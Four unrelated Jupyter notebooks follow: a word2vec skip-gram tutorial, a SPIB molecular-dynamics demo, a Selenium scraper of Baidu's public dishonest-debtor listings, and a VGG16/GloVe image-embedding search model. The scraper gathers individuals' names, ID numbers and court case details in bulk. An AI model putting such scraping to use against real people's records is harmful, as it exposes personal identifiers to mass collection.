1. Load the [text8 dataset](https://s3.amazonaws.com/video.udacity-data.com/topher/2018/October/5bbe6499_text8/text8.zip); a file of cleaned up *Wikipedia article text* from Matt Mahoney.
2. Place that data in the `data` folder in the home directory.
3. Then you can extract it and delete the archive, zip file to save storage space.
After following these steps, you should have one file in your data directory: `data/text8`.
```
# Read the whole text8 corpus into memory and preview the first characters.
with open('data/text8') as f:
    text = f.read()
text[:100]
```
## Pre-processing
Here I'm fixing up the text to make training easier. This comes from the `utils.py` file. The `preprocess` function does a few things:
>* It converts any punctuation into tokens, so a period is changed to ` <PERIOD> `. In this data set, there aren't any periods, but it will help in other NLP problems.
* It removes all words that show up five or *fewer* times in the dataset. This will greatly reduce issues due to noise in the data and improve the quality of the vector representations.
* It returns a list of words in the text.
This may take a few seconds to run, since our text file is quite large. If you want to write your own functions for this stuff, go for it!
```
import utils
words = utils.preprocess(text)
words[:30]
print("total number of words {}".format(len(words)))
print("total number of unique words {}".format(len(list(set(words)))))
```
### Dictionaries
Next, I'm creating two dictionaries to convert words to integers and back again (integers to words). This is again done with a function in the `utils.py` file. `create_lookup_tables` takes in a list of words in a text and returns two dictionaries.
>* The integers are assigned in descending frequency order, so the most frequent word ("the") is given the integer 0 and the next most frequent is 1, and so on.
Once we have our dictionaries, the words are converted to integers and stored in the list `int_words`.
```
vocab_to_int, int_to_vocab = utils.create_lookup_tables(words)
int_words = [vocab_to_int[word] for word in words]
```
## Subsampling
Words that show up often such as "the", "of", and "for" don't provide much context to the nearby words. If we discard some of them, we can remove some of the noise from our data and in return get faster training and better representations. This process is called subsampling by Mikolov. For each word $w_i$ in the training set, we'll discard it with probability given by
$$ P(w_i) = 1 - \sqrt{\frac{t}{f(w_i)}} $$
where $t$ is a threshold parameter and $f(w_i)$ is the frequency of word $w_i$ in the total dataset.
$$ P(0) = 1 - \sqrt{\frac{1*10^{-5}}{1*10^6/16*10^6}} = 0.98735 $$
I'm going to leave this up to you as an exercise. Check out my solution to see how I did it.
> **Exercise:** Implement subsampling for the words in `int_words`. That is, go through `int_words` and discard each word given the probability $P(w_i)$ shown above. Note that $P(w_i)$ is the probability that a word is discarded. Assign the subsampled data to `train_words`.
```
from collections import Counter
import random
import numpy as np

# Subsampling threshold t from Mikolov et al. (typical value 1e-5).
threshold = 1e-5
word_counts = Counter(int_words)
#print(list(word_counts.items())[0]) # dictionary of int_words, how many times they appear
total_count = len(int_words)
# f(w): relative frequency of each word over the whole corpus.
freqs = {word: count/total_count for word, count in word_counts.items()}
# P(w) = 1 - sqrt(t / f(w)): the probability of *discarding* word w.
# Rare words get P(w) <= 0 and are therefore always kept.
p_drop = {word: 1 - np.sqrt(threshold/freqs[word]) for word in word_counts}
# discard some frequent words, according to the subsampling equation
# create a new list of words for training
train_words = [word for word in int_words if random.random() < (1 - p_drop[word])]

print(train_words[:30])
```
Now that our data is in good shape, we need to get it into the proper form to pass it into our network. With the skip-gram architecture, for each word in the text, we want to define a surrounding _context_ and grab all the words in a window around that word, with size $C$.
From [Mikolov et al.](https://arxiv.org/pdf/1301.3781.pdf):
"Since the more distant words are usually less related to the current word than those close to it, we give less weight to the distant words by sampling less from those words in our training examples... If we choose $C = 5$, for each training word we will select randomly a number $R$ in range $[ 1: C ]$, and then use $R$ words from history and $R$ words from the future of the current word as correct labels."
> **Exercise:** Implement a function `get_target` that receives a list of words, an index, and a window size, then returns a list of words in the window around the index. Make sure to use the algorithm described above, where you choose a random number of words from the window.
Say, we have an input and we're interested in the idx=2 token, `741`:
```
[5233, 58, 741, 10571, 27349, 0, 15067, 58112, 3580, 58, 10712]
```
For `R=2`, `get_target` should return a list of four values:
```
[5233, 58, 10571, 27349]
```
def get_target(words, idx, window_size=5):
    """Return the context words in a randomly sized window around ``words[idx]``.

    A radius R is drawn uniformly from [1, window_size]; the R words before
    the index (clipped at the start of the list) and the R words after it are
    returned. The centre word itself is excluded.
    """
    radius = np.random.randint(1, window_size + 1)
    lo = max(idx - radius, 0)
    before = words[lo:idx]
    after = words[idx + 1:idx + radius + 1]
    return list(before + after)
# test your code!
# run this cell multiple times to check for random window selection
int_text = [i for i in range(10)]
print('Input: ', int_text)
idx=5 # word index of interest
target = get_target(int_text, idx=idx, window_size=5)
print('Target: ', target)
```
### Generating Batches
Here's a generator function that returns batches of input and target data for our model, using the `get_target` function from above. The idea is that it grabs `batch_size` words from a words list. Then for each of those batches, it gets the target words in a window.
```
def get_batches(words, batch_size, window_size=5):
    """Yield ``(inputs, targets)`` batches for skip-gram training.

    Each input word is repeated once for every context word drawn from a
    random window around it (see ``get_target``). Trailing words that do not
    fill a complete batch are dropped.
    """
    n_full = len(words) // batch_size
    words = words[:n_full * batch_size]  # only full batches
    for start in range(0, len(words), batch_size):
        chunk = words[start:start + batch_size]
        inputs, targets = [], []
        for pos, centre in enumerate(chunk):
            context = get_target(chunk, pos, window_size)
            targets.extend(context)
            inputs.extend([centre] * len(context))
        yield inputs, targets
int_text = [i for i in range(20)]
x,y = next(get_batches(int_text, batch_size=4, window_size=5))
print('x\n', x)
print('y\n', y)
```
## Building the graph
Below is an approximate diagram of the general structure of our network.
<img src="assets/skip_gram_arch.png" width=60%>
>* The input words are passed in as batches of input word tokens.
* This will go into a hidden layer of linear units (our embedding layer).
* Then, finally into a softmax output layer.
We'll use the softmax layer to make a prediction about the context words by sampling, as usual.
The idea here is to train the embedding layer weight matrix to find efficient representations for our words. We can discard the softmax layer because we don't really care about making predictions with this network. We just want the embedding matrix so we can use it in _other_ networks we build using this dataset.
---
## Validation
Here, I'm creating a function that will help us observe our model as it learns. We're going to choose a few common words and a few uncommon words. Then, we'll print out the closest words to them using the cosine similarity:
<img src="assets/two_vectors.png" width=30%>
$$
\mathrm{similarity} = \cos(\theta) = \frac{\vec{a} \cdot \vec{b}}{|\vec{a}||\vec{b}|}
$$
We can encode the validation words as vectors $\vec{a}$ using the embedding table, then calculate the similarity with each word vector $\vec{b}$ in the embedding table. With the similarities, we can print out the validation words and words in our embedding table semantically similar to those words. It's a nice way to check that our embedding table is grouping together words with similar semantic meanings.
```
def cosine_similarity(embedding, valid_size=16, valid_window=100, device='cpu'):
    """Return the cosine similarity of validation words with words in the embedding matrix.

    Here, ``embedding`` should be a PyTorch embedding module. ``valid_size``
    random word ids are sampled, half from the most frequent ids
    [0, valid_window) and half from [1000, 1000 + valid_window).

    Returns:
        (valid_examples, similarities): the sampled ids as a LongTensor and a
        (valid_size, vocab) tensor of true cosine similarities in [-1, 1].
    """
    # sim = (a . b) / (|a||b|)
    embed_vectors = embedding.weight
    # magnitude of every embedding vector, |b|, shape (1, vocab)
    magnitudes = embed_vectors.pow(2).sum(dim=1).sqrt().unsqueeze(0)
    # pick N words from our ranges (0, window) and (1000, 1000+window);
    # lower id implies more frequent
    valid_examples = np.array(random.sample(range(valid_window), valid_size//2))
    valid_examples = np.append(valid_examples,
                               random.sample(range(1000, 1000+valid_window), valid_size//2))
    valid_examples = torch.LongTensor(valid_examples).to(device)
    valid_vectors = embedding(valid_examples)
    # BUG FIX: the original divided only by |b|, so the returned values were
    # not actual cosine similarities (per-row topk ranking was unaffected,
    # since |a| is constant within a row). Normalize by |a| as well.
    valid_magnitudes = valid_vectors.pow(2).sum(dim=1).sqrt().unsqueeze(1)
    similarities = torch.mm(valid_vectors, embed_vectors.t()) / (valid_magnitudes * magnitudes)
    return valid_examples, similarities
```
## SkipGram model
Define and train the SkipGram model.
> You'll need to define an [embedding layer](https://pytorch.org/docs/stable/nn.html#embedding) and a final, softmax output layer.
An Embedding layer takes in a number of inputs, importantly:
* **num_embeddings** – the size of the dictionary of embeddings, or how many rows you'll want in the embedding weight matrix
* **embedding_dim** – the size of each embedding vector; the embedding dimension
```
import torch
from torch import nn
import torch.optim as optim
class SkipGram(nn.Module):
    """Skip-gram Word2Vec model: embedding -> linear -> log-softmax.

    The trained ``self.embed`` weight matrix is the product of interest; the
    output layer exists only so the network can be trained to predict context
    words.
    """

    def __init__(self, n_vocab, n_embed):
        """n_vocab: vocabulary size; n_embed: embedding dimension."""
        super().__init__()
        self.embed = nn.Embedding(n_vocab, n_embed)
        self.output = nn.Linear(n_embed, n_vocab)
        self.log_softmax = nn.LogSoftmax(dim=1)

    def forward(self, x):
        """Return per-token log-probabilities over the vocabulary."""
        return self.log_softmax(self.output(self.embed(x)))
```
### Training
Below is our training loop, and I recommend that you train on GPU, if available.
**Note that, because we applied a softmax function to our model output, we are using NLLLoss** as opposed to cross entropy. This is because Softmax in combination with NLLLoss = CrossEntropy loss .
```
# check if GPU is available
device = 'cuda' if torch.cuda.is_available() else 'cpu'

embedding_dim=300 # you can change, if you want
model = SkipGram(len(vocab_to_int), embedding_dim).to(device)
# NLLLoss pairs with the LogSoftmax output of SkipGram; together they are
# equivalent to CrossEntropyLoss on raw scores.
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.parameters(), lr=0.003)

print_every = 500  # how often (in steps) to print validation neighbours
steps = 0
epochs = 5

# train for some number of epochs
for e in range(epochs):
    # get input and target batches
    for inputs, targets in get_batches(train_words, 512):
        steps += 1
        inputs, targets = torch.LongTensor(inputs), torch.LongTensor(targets)
        inputs, targets = inputs.to(device), targets.to(device)

        log_ps = model(inputs)
        loss = criterion(log_ps, targets)

        # standard backprop step: clear grads, backprop, update
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        if steps % print_every == 0:
            # getting examples and similarities
            valid_examples, valid_similarities = cosine_similarity(model.embed, device=device)
            _, closest_idxs = valid_similarities.topk(6) # topk highest similarities

            valid_examples, closest_idxs = valid_examples.to('cpu'), closest_idxs.to('cpu')
            for ii, valid_idx in enumerate(valid_examples):
                # drop index 0: the nearest neighbour of a word is itself
                closest_words = [int_to_vocab[idx.item()] for idx in closest_idxs[ii]][1:]
                print(int_to_vocab[valid_idx.item()] + " | " + ', '.join(closest_words))
            print("...")
```
| github_jupyter |
<a href="https://colab.research.google.com/github/tiwarylab/State-Predictive-Information-Bottleneck/blob/main/SPIB_Demo.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# SPIB Demo 2021
This notebook aims to serve as a simple introduction to the state predictive information bottleneck method of [Wang and Tiwary 2021](https://aip.scitation.org/doi/abs/10.1063/5.0038198). The code is implemented using Pytorch.
<img src="https://github.com/tiwarylab/State-Predictive-Information-Bottleneck/blob/main/fig/Fig_alg.png?raw=1">
<img src="https://github.com/tiwarylab/State-Predictive-Information-Bottleneck/blob/main/fig/Fig_FW_example.png?raw=1">
## Clone the Github to Colab
```
!git clone https://github.com/tiwarylab/State-Predictive-Information-Bottleneck
%matplotlib notebook
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import time
plt.rcParams['figure.figsize'] = [25, 20]
np.random.seed(42)
large = 54; med = 36; small = 24
l_width = 3; m_width = 1.5; s_width = 0.7
params = {'axes.titlesize': large,
'legend.fontsize': large,
'legend.title_fontsize':large,
'figure.figsize': (16, 10),
'axes.labelsize': large,
'xtick.labelsize': med,
'ytick.labelsize': med,
'figure.titlesize': large,
'lines.linewidth': l_width,
'lines.markersize': 10,
'axes.linewidth': l_width,
'xtick.major.size': 8,
'ytick.major.size': 8,
'xtick.minor.size': 4,
'ytick.minor.size': 4,
'xtick.major.width': m_width,
'ytick.major.width': m_width,
'xtick.minor.width': s_width,
'ytick.minor.width': s_width,
'grid.linewidth': m_width}
plt.rcParams.update(params)
```
## Data Preparation
The trajectory data can be generated from molecular dynamics simulations or experiments. Here, we use a sample trajectory generated from a Langevin dynamics simulation of a four-well analytical potential.
```
# Load trajectory data
traj_data = np.load("State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_traj_data.npy")
```
### Visualization of the trajectory
```
fig, ax = plt.subplots(figsize=(12,10))
t = np.arange(traj_data.shape[0])
ax.plot(t[::100],traj_data[::100,0],'x',label='x')
ax.plot(t[::100],traj_data[::100,1],'o',fillstyle='none',label='y')
ax.set_xlabel('time step')
ax.legend(fontsize=36,bbox_to_anchor=(0.99, 0.7))
# The four-well analytical potential along x
def potential_fn_FW(x):
    """Evaluate the four-well analytical potential along x.

    Three Gaussian bumps (at x = 0, 0.5 and -0.5) sit on top of an x**8 wall
    and a double-well (x**2 - 1)**2 term, producing four minima. Accepts
    scalars or numpy arrays.
    """
    bumps = (0.6 * np.exp(-80 * x**2)
             + 0.2 * np.exp(-80 * (x - 0.5)**2)
             + 0.5 * np.exp(-40 * (x + 0.5)**2))
    return 2 * (x**8 + bumps) + (x**2 - 1)**2
from mpl_toolkits.axes_grid1 import make_axes_locatable
fig, ax = plt.subplots(1,2,figsize=(18,8))
beta=3
lw=8
x=np.arange(-1,1,0.01)
v=potential_fn_FW(x)
ax[0].plot(x,v,color='k',lw=lw)
ax[0].axvline(x=0,color='b',linestyle='--',lw=lw)
ax[0].axvline(x=-0.5,color='b',linestyle='--',lw=lw)
ax[0].axvline(x=0.5,color='b',linestyle='--',lw=lw)
ax[0].text(-0.75, 1.8, 'A', horizontalalignment='center',fontsize=54)
ax[0].text(-0.25, 1.8, 'B', horizontalalignment='center', fontsize=54)
ax[0].text(0.25, 1.8, 'C', horizontalalignment='center',fontsize=54)
ax[0].text(0.75, 1.8, 'D', horizontalalignment='center', fontsize=54)
ax[0].set_xlabel("x")
ax[0].set_ylabel("Potential")
ax[0].text(-0.2, 1.2, '(a)', horizontalalignment='center',
transform=ax[0].transAxes,fontsize=54, va='top')
FW_counts,FW_xbins,FW_ybins,images = plt.hist2d(traj_data[:,0],traj_data[:,1],bins=100)
FW_counts[FW_counts==0]=FW_counts[FW_counts!=0].min()
FW_G=-np.log(FW_counts)/beta
FW_G=FW_G-np.nanmin(FW_G)
h0=ax[1].contourf(FW_G.transpose(),levels=5,extent=[FW_xbins[0],FW_xbins[-1],FW_ybins[0],FW_ybins[-1]],cmap='jet')
divider = make_axes_locatable(ax[1])
cax = divider.append_axes("top", "5%", pad="3%")
tickz = np.arange(0,FW_G.max(),1)
cb1 = fig.colorbar(h0, cax=cax, orientation="horizontal",ticks=tickz)
cb1.set_label('Free Energy',fontsize=48)
cax.xaxis.set_ticks_position("top")
cax.xaxis.set_label_position("top")
ax[1].set_xlabel("x")
ax[1].set_ylabel('y')
ax[1].text(-0.2, 1.3, '(b)', horizontalalignment='center',
transform=ax[1].transAxes,fontsize=54, va='top')
plt.tight_layout(pad=0.4, w_pad=5, h_pad=3.0)
```
### Generation of initial state labels
```
# discretize the system along x to 10 states as initial state labels
index=0
x_max=traj_data[:,index].max()+0.01
x_min=traj_data[:,index].min()-0.01
state_num=10
eps=1e-3
x_det=(x_max-x_min+2*eps)/state_num
init_label=np.zeros((traj_data.shape[0],state_num))
x_list=np.array([(x_min-eps+n*x_det) for n in range(state_num+1)])
for j in range(state_num):
indices=(traj_data[:,index]>x_list[j])&(traj_data[:,index]<=x_list[j+1])
init_label[indices,j]=1
np.save('State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_init_label10.npy',init_label)
# plot the initial state labels for four well potential system
import matplotlib
from matplotlib import colors as c
data=traj_data
labels=init_label
fig0, ax0 = plt.subplots(figsize=(9,6))
hist=ax0.hist2d(data[:,0],data[:,1],bins=100)
state_num=labels.shape[1]
state_labels=np.arange(state_num)
x_max=np.max(data[:,0])
x_min=np.min(data[:,0])
eps=1e-3
x_det=(x_max-x_min+2*eps)/state_num
x_list=np.array([(x_min-eps+n*x_det) for n in range(state_num+1)])
hist_state=np.zeros([state_num]+list(hist[0].shape))
for i in range(state_num):
hist_state[i]=ax0.hist2d(data[:,0],data[:,1],bins=[hist[1],hist[2]],weights=labels[:,i])[0]
init_label_map=np.argmax(hist_state,axis=0).astype(float)
init_label_map[hist[0]==0]=np.nan
plt.close(fig0)
fig, ax = plt.subplots(figsize=(9,6))
fmt = matplotlib.ticker.FuncFormatter(lambda x, pos: state_labels[x])
tickz = np.arange(0,len(state_labels))
cMap = c.ListedColormap(plt.cm.tab20.colors[0:10])
im=ax.pcolormesh(hist[1], hist[2], init_label_map.T, cmap=cMap, vmin=-0.5, vmax=len(state_labels)-0.5)
cb1 = fig.colorbar(im,ax=ax,format=fmt, ticks=tickz)
for i in range(state_num):
ax.text((x_list[i]+x_list[i+1])/2,0,state_labels[i],horizontalalignment='center',verticalalignment='center',fontsize=32)
plt.xlabel("x")
plt.ylabel("y")
```
## Model
We provide two ways to run SPIB: test_model.py and test_model_advanced.py. Here, we will only discuss the use of test_model.py. For advanced analyses, however, we strongly recommend using test_model_advanced.py, as it provides more features to help you control the training process and tune the hyper-parameters.
## Training
```
%run State-Predictive-Information-Bottleneck/test_model.py -dt 50 -d 1 -encoder_type Nonlinear -bs 512 -threshold 0.01 -patience 2 -refinements 8 -lr 0.001 -b 0.01 -seed 0 -label State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_init_label10.npy -traj State-Predictive-Information-Bottleneck/examples/Four_Well_beta3_gamma4_traj_data.npy
```
## Result Analysis
```
prefix='SPIB/Unweighted_d=1_t=50_b=0.0100_learn=0.001000'
repeat='0'
# load the results
# the deterministic part of the RC learned by SPIB (the mean of the output Gaussian distribution of the encoder)
traj_mean_rep=np.load(prefix+"_traj0_mean_representation"+repeat+".npy")
# the final state labels learned by SPIB
traj_labels=np.load(prefix+"_traj0_labels"+repeat+".npy")
# plot the learned state labels for four well potential system
import matplotlib
from matplotlib import colors as c
data=traj_data
labels=traj_labels
hist=plt.hist2d(data[:,0],data[:,1],bins=100)
state_num=labels.shape[1]
state_labels=np.arange(state_num)
hist_state=np.zeros([state_num]+list(hist[0].shape))
for i in range(state_num):
hist_state[i]=plt.hist2d(data[:,0],data[:,1],bins=[hist[1],hist[2]],weights=labels[:,i])[0]
label_map50=np.argmax(hist_state,axis=0).astype(float)
label_map50[hist[0]==0]=np.nan
plt.close()
fig, ax = plt.subplots(figsize=(9,6))
fmt = matplotlib.ticker.FuncFormatter(lambda x, pos: state_labels[x])
tickz = np.arange(0,len(state_labels))
cMap = c.ListedColormap(plt.cm.tab20.colors[0:10])
im=ax.pcolormesh(hist[1], hist[2], label_map50.T, cmap=cMap, vmin=-0.5, vmax=len(state_labels)-0.5)
cb1 = fig.colorbar(im,ax=ax,format=fmt, ticks=tickz)
ax.text(-0.75,0,'1',horizontalalignment='center',verticalalignment='center',fontsize=64)
ax.text(0.75,0,'8',horizontalalignment='center',verticalalignment='center',fontsize=64)
ax.text(-0.25,0,'3',horizontalalignment='center',verticalalignment='center',fontsize=64)
ax.text(0.25,0,'6',horizontalalignment='center',verticalalignment='center',fontsize=64)
plt.xlabel("x")
plt.ylabel("y")
# plot the learned RC for four well potential system
data=traj_data
hist=plt.hist2d(data[:,0],data[:,1],bins=100)
hist_RC=plt.hist2d(data[:,0],data[:,1],bins=[hist[1],hist[2]],weights=traj_mean_rep[:,0])
plt.close()
fig, ax = plt.subplots(figsize=(15,10))
RC=np.divide(hist_RC[0],hist[0])
im=ax.contourf(RC.T, extent=[hist_RC[1][0],hist_RC[1][-1],hist_RC[2][0],hist_RC[2][-1]],levels=10,
cmap=plt.cm.jet)
cb1 = fig.colorbar(im,ax=ax)
cb1.set_label('RC')
plt.xlabel("x")
plt.ylabel("y")
plt.tight_layout()
```
| github_jupyter |
```
import csv
import random
import sys
import time

import pandas as pd
from selenium import webdriver
from selenium.common.exceptions import (NoSuchElementException,
                                        StaleElementReferenceException,
                                        TimeoutException)
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
driver = webdriver.Chrome('/Users/leijunjie/Downloads/chromedriver')
driver.get("http://www.baidu.com")
input = driver.find_element_by_id('kw')
input.send_keys("失信")
time.sleep(1)
input.send_keys("被执行人")
time.sleep(1)
input.send_keys(Keys.ENTER)
WebDriverWait(driver, 80).until(EC.visibility_of_element_located((By.CSS_SELECTOR, 'div.op_trust_mainBox')))
def fetch_page_data():
    """Collect the records shown on the current Baidu "失信被执行人" results page.

    Clicks each ``li.op_trust_item`` to expand its detail table and gathers
    the fields. A 7-cell detail table means the debtor is an individual; an
    8-cell one carries the debtor type in its first cell.

    Returns:
        pd.DataFrame: one row per announcement on the current page.
    """
    Name_list = []
    Ids = []
    val1 = []
    val2 = []
    val3 = []
    val4 = []
    val5 = []
    val6 = []
    val7 = []
    val8 = []
    items = driver.find_elements_by_css_selector('li.op_trust_item')
    for item in items:
        try:
            Name = item.find_element_by_css_selector(
                'span.op_trust_name').text
            Id_number = item.find_element_by_css_selector(
                'span.op_trust_fl').text
            # Click & Open baidu Bulletin Board
            ActionChains(driver).click(item).perform()
            values = item.find_elements_by_css_selector(
                'tbody td.op_trust_tdRight')
        except StaleElementReferenceException:
            # if element attachment error then we rest for 1 sec and retry once
            try:
                print("出现异常,等待重试...")
                time.sleep(1)
                # BUG FIX: this is a plain function, not a method -- there is
                # no `self` here; use the module-level `driver`.
                ActionChains(driver).click(item).perform()
                values = item.find_elements_by_css_selector(
                    'tbody td.op_trust_tdRight')
            except StaleElementReferenceException:
                print("重试失败,跳过该公告...")
                continue
        if len(values) == 7:
            # Individual debtor: no debtor-type cell, all 7 cells are data.
            Name_list.append(Name)
            Ids.append(Id_number)
            val1.append(values[0].text)
            val2.append(values[1].text)
            val3.append(values[2].text)
            val4.append(values[3].text)
            val5.append(values[4].text)
            val6.append(values[5].text)
            val7.append(values[6].text)
            val8.append('individual')
        else:
            # Company debtor: first cell holds the debtor type.
            Name_list.append(Name)
            Ids.append(Id_number)
            val1.append(values[1].text)
            val2.append(values[2].text)
            val3.append(values[3].text)
            val4.append(values[4].text)
            val5.append(values[5].text)
            val6.append(values[6].text)
            val7.append(values[7].text)
            val8.append(values[0].text)
    df_temp = pd.DataFrame(
        {
            "Name": Name_list,
            # BUG FIX: was `Id_number` (the scalar from the last loop
            # iteration, broadcast to every row); use the collected list.
            "ID_Num": Ids,
            "执行法院": val1,
            "省份": val2,
            "案号": val3,
            "生效法律文书": val4,
            "被执行人情况": val5,
            "具体行为": val6,
            "发布时间": val7,
            "if_company": val8
        })
    return df_temp
df = fetch_page_data()
pagenum = 1
while (pagenum < 3):
print("Scraping Page %d..." % pagenum)
next_btn = driver.find_element_by_css_selector(
'div.op_trust_page span.op_trust_page_next')
ActionChains(driver).click(next_btn).perform()
time.sleep(random.randint(10,12))
df_2 = fetch_page_data()
df = pd.merge(df, df_2, how='outer')
time.sleep(random.randint(5,9))
pagenum +=1
print('finished!')
df.info()
df
```
| github_jupyter |
```
import os
import time
import numpy as np
def load_embeddings(embeddings_path):
    """Read GloVe-style text embeddings into a ``{word: float32 ndarray}`` dict.

    Each line of the file is expected to be a token followed by its
    space-separated vector components.
    """
    vectors = {}
    with open(embeddings_path, 'r') as fh:
        for row in fh:
            token, *coords = row.split()
            vectors[token] = np.asarray(coords, dtype='float32')
    return vectors
word_embeddings = load_embeddings('./glove.6B.300d.txt')
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
def get_word_embedding(category, word_embeddings, wordvec_size=300):
    """Look up the vector for *category*; unknown words map to a zero vector."""
    return word_embeddings.get(category, np.zeros(shape=wordvec_size))
def get_word_embedding_from_description(description, word_embeddings, wordvec_size=300):
    """Average the embeddings of the non-stopword tokens of *description*.

    English stopwords (plus ";") are dropped; the remaining tokens are looked
    up with ``get_word_embedding`` (unknown words contribute zero vectors).

    Returns:
        np.ndarray of length wordvec_size. BUG FIX: when every token is a
        stopword the original np.mean over an empty array produced nan with a
        RuntimeWarning; a zero vector is returned instead.
    """
    stop_words = set(stopwords.words('english'))
    stop_words.add(";")
    words = word_tokenize(description)
    wordvecs = [get_word_embedding(word, word_embeddings, wordvec_size)
                for word in words if word not in stop_words]
    if not wordvecs:
        return np.zeros(shape=wordvec_size)
    return np.mean(np.array(wordvecs), axis=0)
def preprocess_iaprtc12_images(path, word_embeddings, wordvec_size=300):
    """Walk the IAPR TC-12 tree, pairing each image with a description embedding.

    For every image under ``<path>/images`` whose matching ``.eng`` annotation
    exists under ``annotations_complete_eng``, the image is loaded at 224x224
    and VGG16-preprocessed, and the <DESCRIPTION> line of the annotation is
    averaged into one word embedding via get_word_embedding_from_description.

    Returns:
        (images, labels, paths, no_desc_images): ndarray of preprocessed
        pixels, ndarray of description embeddings, the matching file paths,
        and the paths of images that had no annotation file.
    """
    image_list = []
    labels_list = []
    paths_list = []
    no_desc_images = []
    for dir_path, dir_names, image_names in os.walk(os.path.join(path, "images")):
        if not image_names: # skip current directory listing
            continue
        # Annotation tree mirrors the image tree under a different root.
        desc_dir_path = dir_path.replace("/images/", "/annotations_complete_eng/")
        for img_name in image_names:
            full_path = os.path.join(dir_path, img_name)
            desc_file = os.path.join(desc_dir_path, img_name).replace(".jpg", ".eng")
            if os.path.exists(desc_file):
                word_embedding = np.array([])
                with open(desc_file, 'r', errors='replace') as desc:
                    # NOTE(review): assumes <DESCRIPTION> is always the 4th
                    # line of the .eng file -- TODO confirm for all entries.
                    desc_line = desc.readlines()[3]
                    description = desc_line.replace("<DESCRIPTION>", "").replace("</DESCRIPTION>", "")
                    word_embedding = get_word_embedding_from_description(description, word_embeddings)
                img_pil = image.load_img(full_path, target_size=(224, 224))
                img_raw = image.img_to_array(img_pil)
                img = preprocess_input(img_raw) # VGG16 image preprocessing.
                image_list.append(img)
                labels_list.append(word_embedding)
                paths_list.append(full_path)
            else:
                no_desc_images.append(full_path)
    return np.array(image_list), np.array(labels_list), paths_list, no_desc_images
images_vgg16, image_embeddings, image_paths, no_desc_images = preprocess_iaprtc12_images("./iaprtc12", word_embeddings)
images_vgg16.shape
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras.models import Model
from tensorflow.keras import optimizers
from tensorflow.keras.layers import Dense, BatchNormalization, Activation, Dropout
from tensorflow.keras.losses import cosine_similarity
def hybrid_model_backbone(intermediate_dim=2000, word_embedding_dim=300):
    """Build the image-to-word-embedding regression model.

    A frozen VGG16 supplies the fc2 features; a two-layer dense head maps
    them into the word-embedding space. Reads the global ``images_vgg16``
    for the input shape.
    """
    vgg16 = VGG16(input_shape=images_vgg16.shape[1:])
    x = vgg16.get_layer('fc2').output
    # Freeze the pretrained backbone; only the new head is trained.
    for layer in vgg16.layers:
        layer.trainable = False
    x = Dense(intermediate_dim, name="dense1")(x)
    x = BatchNormalization()(x)
    x = Activation("relu")(x)
    x = Dropout(0.5)(x)
    x = Dense(word_embedding_dim, name="dense2")(x)
    outputs = BatchNormalization()(x)
    model = Model(inputs=[vgg16.input], outputs=outputs)
    # https://faroit.com/keras-docs/2.0.8/optimizers/
    sgd = optimizers.SGD(decay=1e-6, momentum=0.9, nesterov=True)
    # The cosine_similarity loss is minimised, aligning predicted vectors
    # with the target description embeddings.
    model.compile(optimizer=sgd, loss=cosine_similarity)
    return model
hybrid_model = hybrid_model_backbone()
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import load_model
def get_model_trained(model, X, y, model_path, train_model=False):
    """Train *model* on (X, y) and save it, or load a previously saved model.

    With train_model=False (the default) the data arguments are ignored and
    the model is simply loaded from *model_path*.
    """
    if not train_model:
        # Assuming that there is a model in a given path.
        return load_model(model_path)

    epochs, batch_size = (20, 32)
    X, y = shuffle(X, y, random_state=7)
    X_train, X_test, y_train, y_test = \
        train_test_split(X, y, test_size=0.3, random_state=7)
    # Keep the best validation checkpoint alongside the final save.
    checkpointer = ModelCheckpoint(
        filepath='best.hdf5', verbose=1, save_best_only=True)
    model.fit(X_train, y_train,
              validation_data=(X_test, y_test),
              epochs=epochs,
              batch_size=batch_size,
              callbacks=[checkpointer])
    model.save(model_path)
    return model
hybrid_model = get_model_trained(hybrid_model, images_vgg16, image_embeddings, "./model_and_index_iaprtc12/model_new", train_model=False)
from annoy import AnnoyIndex
def get_annoy_index(vectors_list, number_of_trees=20, dims=300):
    """Build an Annoy index (angular metric) over the given vectors.

    Item ids are the positions of the vectors in *vectors_list*.
    """
    index = AnnoyIndex(dims, 'angular')
    for item_id, vector in enumerate(vectors_list):
        index.add_item(item_id, vector)
    index.build(number_of_trees)
    return index
def generate_word_annoy_index(word_embeddings):
    """Index every word embedding in Annoy.

    Returns:
        (annoy_index, word_index) where word_index maps Annoy item id -> word.
    """
    word_index = dict(enumerate(word_embeddings))
    vectors = [word_embeddings[word] for word in word_index.values()]
    return get_annoy_index(vectors), word_index
# This might take minute or two (since it is a 400k corpus of 300d words).
word_annoy_index, word_index = generate_word_annoy_index(word_embeddings)
import json
def generate_image_embeddings(image_paths, model):
    """Run every image through *model* and return its embedding.

    Returns:
        (embeddings, image_path_index) where image_path_index maps row
        index -> file path.

    NOTE(review): allocates a buffer shaped like the global ``images_vgg16``,
    so it assumes len(image_paths) == images_vgg16.shape[0] -- TODO confirm.
    """
    images = np.zeros(shape=images_vgg16.shape)
    image_path_index = dict(enumerate(image_paths))
    for ind, path in image_path_index.items():
        img_pil = image.load_img(path, target_size=images_vgg16.shape[1:-1])
        img_raw = image.img_to_array(img_pil)
        images[ind, :, :, :] = img_raw
    # VGG16 preprocessing is applied to the whole batch at once.
    image_embeddings_list = model.predict(preprocess_input(images))
    return image_embeddings_list, image_path_index
def load_image_embeddings(vectors_filename, mapping_filename):
    """Load embeddings from ``<vectors_filename>.npy`` and the index-to-path
    mapping from ``<mapping_filename>.json``."""
    embeddings = np.load("%s.npy" % vectors_filename)
    with open("%s.json" % mapping_filename) as mapping_file:
        raw_mapping = json.load(mapping_file)
    # JSON object keys are always strings; restore the integer indexes.
    path_index = {int(key): path for key, path in raw_mapping.items()}
